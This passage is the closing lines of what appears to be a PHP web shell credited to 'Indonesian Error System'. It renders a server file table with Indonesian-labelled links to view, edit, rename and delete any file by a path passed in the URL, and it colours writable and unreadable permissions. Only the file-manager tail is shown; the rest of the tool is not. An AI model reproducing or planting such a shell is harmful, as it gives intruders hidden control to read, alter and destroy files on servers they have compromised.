1555. }elseif ($ext == "pdf") {
1556. echo 'dokumen/pdf';
1557. }elseif ($ext == "mp4") {
1558. echo 'media/mp4';
1559. }elseif ($ext == "mp3") {
1560. echo 'media/mp3';
1561. }elseif ($ext == "git") {
1562. echo 'application/octet-stream';
1563. }elseif ($ext == "md") {
1564. echo 'application/octet-stream';
1565. }else{
1566. echo 'dokumen/docs';
1567. }
1568. echo '</td>
1569. <td><center>'.$size.'</center></td>
1570. <td><center>';
1571. if(is_writable($path.'/'.$file)) echo '<font color="#00ff00">';
1572. elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
1573. echo perms($path.'/'.$file);
1574. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>
1575. <td class="text-center">
1576. <a title="Lihat" class="badge" href="?dir='.$path.'&aksi=view&dirf='.$path.'/'.$file.'">Lihat</a>
1577. <a title="Edit" class="badge" href="?dir='.$path.'&aksi=edit&dirf='.$path.'/'.$file.'">Edit</a>
1578. <a title="Edit" class="badge" href="?dir='.$path.'&aksi=rename&dirf='.$path.'/'.$file.'">Ubah Nama</a>
1579. <a class="badge" href="?dir='.$path.'&aksi=hapusf&dirf='.$path.'/'.$file.'" title="Delete">Hapus</a>
1580. </td>
1581. </tr>';
1582. }
1583. echo '</table></div><hr/>';
1584. echo "<a href='' class='scrollToTop'><i class='fas fa-arrow-up up'></i></a>";
1585. echo '<center><small>Copyright all right reserved '.date('M-Y').' <a href="http://ies-team.org">Indonesian Error System</a></small></center>';
1586. ?>